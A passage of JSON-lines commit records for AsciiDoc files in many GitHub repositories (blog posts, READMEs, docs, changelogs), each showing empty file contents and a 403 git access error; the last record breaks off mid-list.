2018-09-25-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-25-Scratch.adoc","new_file":"_posts\/2018-09-25-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6016c59a288ce4c8a359602cdd82ad28a80c25a3","subject":"Add bullet points to Not Supported list","message":"Add bullet points to Not Supported list\n\nMinor formatting, but it threw me for a loop when I read it","repos":"tobiasge\/OutlookPrivacyPlugin,tobiasge\/OutlookPrivacyPlugin,dejavusecurity\/OutlookPrivacyPlugin,korusdipl\/OutlookPrivacyPlugin,dejavusecurity\/OutlookPrivacyPlugin,GPGatHGB\/OutlookPrivacyPlugin,Baebeca\/OutlookPrivacyPlugin,korusdipl\/OutlookPrivacyPlugin,GPGatHGB\/OutlookPrivacyPlugin,Baebeca\/OutlookPrivacyPlugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/korusdipl\/OutlookPrivacyPlugin.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"4fa56ced298a85550fa094091e6ca1a93643eb37","subject":"Add README","message":"Add README\n","repos":"BrianOn99\/molamola-ftp","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/BrianOn99\/molamola-ftp.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"b9934b184c0ac197b8e2d109199bef791fc2953f","subject":"README","message":"README\n","repos":"motemen\/go-quickfix","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/motemen\/go-quickfix.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"548caf5b4618c0be7a80ef1f2de042cb154a6053","subject":"Update 2016-06-30-Feedback-Email.adoc","message":"Update 2016-06-30-Feedback-Email.adoc","repos":"iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io","old_file":"_posts\/2016-06-30-Feedback-Email.adoc","new_file":"_posts\/2016-06-30-Feedback-Email.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iveskins\/iveskins.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"51cf87ce9484c387b76297b48ecd747e69f62c90","subject":"Update 2017-06-23-mutual-respect.adoc","message":"Update 2017-06-23-mutual-respect.adoc","repos":"debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io","old_file":"_posts\/2017-06-23-mutual-respect.adoc","new_file":"_posts\/2017-06-23-mutual-respect.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debbiezhu\/debbiezhu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"969fc1ba0d3cb2477c25aa074d61ed41a349163b","subject":"y2b create post Nintendo 3DS Review","message":"y2b create post Nintendo 3DS Review","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-04-05-Nintendo-3DS-Review.adoc","new_file":"_posts\/2011-04-05-Nintendo-3DS-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e142812ed667e543120394b6265548efc824ae91","subject":"Update 2016-02-05-A-few-introductions.adoc","message":"Update 2016-02-05-A-few-introductions.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-02-05-A-few-introductions.adoc","new_file":"_posts\/2016-02-05-A-few-introductions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"556b1bc5d06d4fd767261eaa2bea8f2df1b55a8c","subject":"Update 2016-04-03-etat-limite-borderline-tpl.adoc","message":"Update 2016-04-03-etat-limite-borderline-tpl.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-borderline-tpl.adoc","new_file":"_posts\/2016-04-03-etat-limite-borderline-tpl.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3feb0979a9bdeab8b0fa906c23c0ad10b50bf85a","subject":"Update 2016-07-20-vim.adoc","message":"Update 2016-07-20-vim.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-20-vim.adoc","new_file":"_posts\/2016-07-20-vim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c32aff6b2e7a939177ebfcbd903c251f6b6ba3cf","subject":"add placeholder for post about :target :bundle","message":"add placeholder for post about :target :bundle\n","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2020-04-13-bundle-target.adoc","new_file":"content\/news\/2020-04-13-bundle-target.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"ac9275dc4ed905cb4705d7a8ae14c9e7f7bbc0dc","subject":"Update 2015-08-01-Neue-Partner.adoc","message":"Update 2015-08-01-Neue-Partner.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-08-01-Neue-Partner.adoc","new_file":"_posts\/2015-08-01-Neue-Partner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b02420569e312f526973b54a7b12a0edd0079f1f","subject":"Update 2016-04-28-Word-Press-1.adoc","message":"Update 2016-04-28-Word-Press-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"184c15de9d8a3b25917d2045a49bd48056a49ce2","subject":"Update 2016-08-25-Tmux-Kung-fu.adoc","message":"Update 2016-08-25-Tmux-Kung-fu.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"beb10736d90feef4c2304b606fbfb33f16ad63f7","subject":"Update 2017-05-11-picture-book.adoc","message":"Update 2017-05-11-picture-book.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-11-picture-book.adoc","new_file":"_posts\/2017-05-11-picture-book.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c77cce3e3dbe8f2339e665cade38968cacbcf88b","subject":"added CONTRIBUTING for CLA reference on pull request and issue submission.","message":"added CONTRIBUTING for CLA reference on pull request and issue submission.\n","repos":"newkek\/incubator-tinkerpop,apache\/incubator-tinkerpop,artem-aliev\/tinkerpop,RedSeal-co\/incubator-tinkerpop,vtslab\/incubator-tinkerpop,apache\/tinkerpop,artem-aliev\/tinkerpop,gdelafosse\/incubator-tinkerpop,jorgebay\/tinkerpop,krlohnes\/tinkerpop,RussellSpitzer\/incubator-tinkerpop,krlohnes\/tinkerpop,Lab41\/tinkerpop3,pluradj\/incubator-tinkerpop,pluradj\/incubator-tinkerpop,RussellSpitzer\/incubator-tinkerpop,apache\/incubator-tinkerpop,mike-tr-adamson\/incubator-tinkerpop,robertdale\/tinkerpop,BrynCooke\/incubator-tinkerpop,gdelafosse\/incubator-tinkerpop,artem-aliev\/tinkerpop,RedSeal-co\/incubator-tinkerpop,jorgebay\/tinkerpop,edgarRd\/incubator-tinkerpop,BrynCooke\/incubator-tinkerpop,mike-tr-adamson\/incubator-tinkerpop,pluradj\/incubator-tinkerpop,mike-tr-adamson\/incubator-tinkerpop,apache\/tinkerpop,newkek\/incubator-tinkerpop,apache\/tinkerpop,samiunn\/incubator-tinkerpop,samiunn\/incubator-tinkerpop,robertdale\/tinkerpop,dalaro\/incubator-tinkerpop,apache\/incubator-tinkerpop,samiunn\/incubator-tinkerpop,robertdale\/tinkerpop,PommeVerte\/incubator-tinkerpop,RedSeal-co\/incubator-tinkerpop,apache\/tinkerpop,robertdale\/tinkerpop,gdelafosse\/incubator-tinkerpop,PommeVerte\/incubator-tinkerpop,mpollmeier\/tinkerpop3,krlohnes\/tinkerpop,rmagen\/incubator-tinkerpop,n-tran\/incubator-tinkerpop,BrynCooke\/incubator-tinkerpop,apache\/tinkerpop,vtslab\/incubator-tinkerpop,newkek\/incubator-tinkerpop,vtslab\/incubator-tinkerpop,artem-aliev\/tinkerpop,krlohnes\/tinkerpop,velo\/incubator-tinkerpop,mpollmeier\/tinkerpop3,velo\/incubator-tinkerpop,dalaro\/incubator-tinkerpop,robertdale\/tinkerpop,Lab41\/tinkerpop3,edgarRd\/incubator-tinkerpop,apache\/tinkerpop,krlohnes\/tinkerpop,jorgebay\/tinkerpop,apache\/tinkerpop,rmagen\/incubator-tinkerpop,n-tran\/incubator-tinkerpop,rmagen\/incubator-tinkerpop,dalaro\/incubator-tinkerpop,RussellSpitzer\/incubator-tinkerpop,PommeVerte\/incubator-tinkerpop,n-tran\/incubator-tinkerpop,edgarRd\/incubator-tinkerpop,artem-aliev\/tinkerpop,jorgebay\/tinkerpop,velo\/incubator-tinkerpop","old_file":"CONTRIBUTING.asciidoc","new_file":"CONTRIBUTING.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jorgebay\/tinkerpop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6d64ad3bfa79498a96f57c1fb7a3eec18ed45a96","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/life_as_a_dance.adoc","new_file":"content\/writings\/life_as_a_dance.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"a0ac2a869a74abd39bfbdddeb7648849045f85f1","subject":"Update 2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","message":"Update 2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","new_file":"_posts\/2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"88fac280223eba766ae4be5a3560a954ce2f40f0","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38f83602123231af1767dbb34d77e6dc7f168126","subject":"Create common-grailsApplicationForge-grails3.adoc","message":"Create common-grailsApplicationForge-grails3.adoc","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-grailsApplicationForge-grails3.adoc","new_file":"src\/main\/docs\/common-grailsApplicationForge-grails3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f42c7e8939be9734dd9a4d9f518c6f9dc132d593","subject":"Update 2016-03-29-Glosario.adoc","message":"Update 2016-03-29-Glosario.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Glosario.adoc","new_file":"_posts\/2016-03-29-Glosario.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"72213d28004ada97b4d978bc1140da704cab7621","subject":"Update 2016-08-15-Wechat.adoc","message":"Update 2016-08-15-Wechat.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-08-15-Wechat.adoc","new_file":"_posts\/2016-08-15-Wechat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"23ecd632e8e88fc7293a76d6b4aa8cdde55ae9df","subject":"Debezium 1.2.0.Alpha1 release announcement","message":"Debezium 1.2.0.Alpha1 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2020-04-16-debezium-1-2-alpha1-released.adoc","new_file":"blog\/2020-04-16-debezium-1-2-alpha1-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"38f9e11933ce2d2e6a6ebc6c0085bc6db45c7cfb","subject":"Update index.asciidoc","message":"Update index.asciidoc","repos":"SMB-TEC\/extended-objects,buschmais\/extended-objects","old_file":"doc\/src\/main\/asciidoc\/index.asciidoc","new_file":"doc\/src\/main\/asciidoc\/index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SMB-TEC\/extended-objects.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8dd4312c75c04e82fae97766432ceacb32548863","subject":"Update 2018-08-18-Bob-Dylan.adoc","message":"Update 2018-08-18-Bob-Dylan.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-08-18-Bob-Dylan.adoc","new_file":"_posts\/2018-08-18-Bob-Dylan.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36f253dc0c4fc436eecd4a66ee3505aaeb5eaacd","subject":"adding place holder for Lattice","message":"adding place holder for Lattice\n","repos":"redhat-developer-demos\/docker-java,redhat-developer-demos\/docker-java","old_file":"chapters\/docker-lattice.adoc","new_file":"chapters\/docker-lattice.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redhat-developer-demos\/docker-java.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d2a2c61b81e9441e8c3cb36336cca4bbb6c37fd4","subject":"Remove drag and drop from Tree doc (#9992)","message":"Remove drag and drop from Tree doc (#9992)\n\nTree does not support drag and drop right now (see #9804).","repos":"Darsstar\/framework,mstahv\/framework,asashour\/framework,mstahv\/framework,Darsstar\/framework,Darsstar\/framework,mstahv\/framework,Darsstar\/framework,mstahv\/framework,asashour\/framework,asashour\/framework,Darsstar\/framework,asashour\/framework,asashour\/framework,mstahv\/framework","old_file":"documentation\/components\/components-tree.asciidoc","new_file":"documentation\/components\/components-tree.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7596901baac0f53809d1a17b214a26daf71a384e","subject":"S3, S4","message":"S3, S4\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Course Object\/Planning.adoc","new_file":"Course Object\/Planning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f815bf68772d3f853b69fd25e8c77b50ca3bcb32","subject":"Update 2015-05-18-Titelmusik.adoc","message":"Update 2015-05-18-Titelmusik.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-05-18-Titelmusik.adoc","new_file":"_posts\/2015-05-18-Titelmusik.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00a184e139abb30608bb4d9178efa8cf5f148f01","subject":"Create Profiling.asciidoc","message":"Create Profiling.asciidoc","repos":"luiz158\/docs,luiz158\/docs,forge\/docs,forge\/docs","old_file":"tutorials\/Profiling.asciidoc","new_file":"tutorials\/Profiling.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"85c0a21db418fe60305a2bddacbf2beffcd213d2","subject":"Update 2017-08-29-proxmox-installer-screen-resolution-problem-out-of-range-cannot-display-the-video-mode.adoc","message":"Update 2017-08-29-proxmox-installer-screen-resolution-problem-out-of-range-cannot-display-the-video-mode.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2017-08-29-proxmox-installer-screen-resolution-problem-out-of-range-cannot-display-the-video-mode.adoc","new_file":"_posts\/2017-08-29-proxmox-installer-screen-resolution-problem-out-of-range-cannot-display-the-video-mode.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46492d0deb426734efafa9b5efb3a938f12993a9","subject":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr.adoc","message":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr.adoc","new_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"56e06d4580e99c951878ae7c818f360f49911439","subject":"Update 2016-04-03-Nodejs-Function-Closures-and-Scope.adoc","message":"Update 2016-04-03-Nodejs-Function-Closures-and-Scope.adoc","repos":"Kif11\/Kif11.github.io,Kif11\/Kif11.github.io,Kif11\/Kif11.github.io,Kif11\/Kif11.github.io","old_file":"_posts\/2016-04-03-Nodejs-Function-Closures-and-Scope.adoc","new_file":"_posts\/2016-04-03-Nodejs-Function-Closures-and-Scope.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Kif11\/Kif11.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c7b7417b75bb0a7d7e32079004cde1739b89ce8","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d01e715082f37738de2070cd76f0e945a72f232f","subject":"chore(changelog): Add a changelog.adoc (#241)","message":"chore(changelog): Add a changelog.adoc (#241)\n\nand added features for 0.2.0","repos":"knative\/client,knative\/client","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/knative\/client.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3a6e0a2b207bfbd281ed8bfe6af1418fece40c03","subject":"Update 2015-05-18-uGUI.adoc","message":"Update 2015-05-18-uGUI.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-05-18-uGUI.adoc","new_file":"_posts\/2015-05-18-uGUI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"222d39d90265ed9fe4993fb4f15c3a228dfbb2b4","subject":"Update 2018-02-23-test.adoc","message":"Update 2018-02-23-test.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-test.adoc","new_file":"_posts\/2018-02-23-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0eb0ebbb1da15b316c82c22c91b39db17932ae2b","subject":"Update 2017-08-21-.adoc","message":"Update 2017-08-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-21-.adoc","new_file":"_posts\/2017-08-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"232d98a5c5af57879e5cdfc4526262b21b97687b","subject":"doc(README): add chinese version","message":"doc(README): add chinese version\n","repos":"mimiz\/mimiz.github.io,leomedia\/blog,fwalloe\/infosecbriefly,adest\/press,gilangdanu\/blog,nicolaschaillot\/pechdencouty,ml4den\/hubpress,marksubbarao\/hubpress.io,sxgc\/blog,ssundarraj\/hubpress.io,kim0\/hubpress.io,MirumSG\/agencyshowcase,BenBals\/hubpress,henryouly\/henryouly.github.io,elinep\/blog,sakkemo\/blog,MirumSG\/agencyshowcase,chackomathew\/blog,tehbilly\/blog,moonPress\/press.io,igovsol\/blog,benignbala\/hubpress.io,manelvf\/blog,topicusonderwijs\/topicusonderwijs.github.io,pdudits\/pdudits.github.io,jfavlam\/Concepts,berryzed\/tech-blog,Nepal-Blockchain\/danphe-blogs,JiajiaGuo\/jiajiaguo.github.io,magivfer\/pages,tedbergeron\/hubpress.io,moonPress\/press.io,agentmilindu\/hubpress.io,J0HDev\/blog,shinnoki\/hubpress.io,nicksam112\/nicksam112.github.io,flug\/flug.github.io,dawn-chiniquy\/clear-project.org,devananda\/devananda.github.io,kobusb\/blog,tehbilly\/blog,roelvs\/hubpress.io,dsuryakusuma\/dsuryakusuma.github.io,aql\/hubpress.io,adjiebpratama\/press,jlmcgehee21\/nooganeer,wzzrd\/hubpress.io,jcsirot\/hubpress.io,hva314\/blog,JohanBrunet\/hubpress.io,apoch\/blog,abesn\/hubpress.io,Evolution2626\/blog,sxgc\/blog,hutchr\/hutchr.github.io,erramuzpe\/gsoc2016,henryouly\/henryouly.github.io,laibaogo\/hubpress.io,errorval\/blog,pdudits\/hubpress,MirumSG\/agencyshowcase,ucide-coruptia\/ucide-coruptia.ro,sharmivssharmi\/sharmipress,Jekin6\/blog,sanctumware\/hubpress,lauesa\/Blog,dmacstack\/glob,shunkou\/blog,baocongchen\/blogs,booleanbalaji\/hubpress.io,anshu92\/blog,ice09\/ice09ng,harichen\/harichen.io,benignbala\/benignbala.hubpress.io,ice09\/ice09ng,AlexL777\/hubpressblog,SnorlaxH\/blog.urusa.me,mikqi\/blog,Jason2013\/hubpress,ashalkhakov\/hubpress.io,Sth0nian\/hubpress.io,sxgc\/blog,rubyinhell\/hubpress.io,danen-carlson\/blog,mairandomness\/randomblog,dmacstack\/glob,jamarortiz\/pragmaticalware,princeminz\/blog,Astrokoala-Studio\/hubpress.io,palaxi00\/palaxi00.github.io,palaxi00\/palaxi00.github.io,ciena-blueplanet\/developers.blog,tom-konda\/blog,agentmilindu\/hubpress.io,csiebler\/hubpress-test,sebprev\/blog,thesagarsutar\/hubpress,xinmeng1\/note,sakkemo\/blog,metadevfoundation\/metadevfoundation.github.io,shunkou\/blog,brieb\/hubpress.io,pepite\/hubpress.io,agentmilindu\/hubpress.io,joshuarrrr\/hubpress.io,rubyinhell\/hubpress.io,atomfrede\/shiny-adventure,201507\/blog,hva314\/blog,Jason2013\/hubpress,cmhgroupllc\/blog,qingyuqy\/qingyuqy.io,entropyz\/blog,ruaqiwei23\/blog,ErJ101\/hbspractise,hang-h\/hubpress.io,victorcouste\/blog,rh0\/the-myriad-path,mimiz\/mimiz.github.io,gbougeard\/blog.english,marksubbarao\/hubpress.io,AirHacX\/blog.airhacx.com,gsha0\/hubpress.io,crotel\/meditation,imukulsharma\/imukulsharma.github.io,gscheibel\/blog,iKnowMagic\/hubpress.io,RussellSnyder\/hubpress-test,joescharf\/joescharf.github.io,JohanBrunet\/hubpress.io,chackomathew\/blog,Bloggerschmidt\/bloggerschmidt.de,arabindamoni\/hubpress.io,gsha0\/hubpress.io,wzzrd\/hubpress.io,kobusb\/blog,iKnowMagic\/hubpress.io,isaacriquelme\/endata.do,lawrencetaylor\/hubpress.io,sanctumware\/hubpress,lrabiet\/patisserie,celsogg\/blog,devananda\/devananda.github.io,filipeuva\/filipeuva.blog,kornel661\/blog-test-jm,artavels\/pages,palaxi00\/palaxi00.github.io,ml4den\/hubpress,apoch\/blog,crotel\/studio,Lukas238\/the-holodeck,Adyrhan\/adyrhan.github.io,joshuarrrr\/hubpress.io,anandjagadeesh\/blog,YvonneZhang\/yvonnezhang.github.io,discimport\/blog.discimport.dk,btsibr\/myhubpress,kim0\/hubpress.io,corporatesanyasi\/corporatesanyasi.github.io,mgreau\/posts,ditirambo\/ditirambo.es,hiun\/hubpress.io,nandansaha\/AroundTheWeb,IEEECompute\/blog,anandjagadeesh\/blog,demiansan\/demiansan.github.io,errorval\/blog,diodario\/hubpress.io,mcornell\/OFM,mkc188\/hubp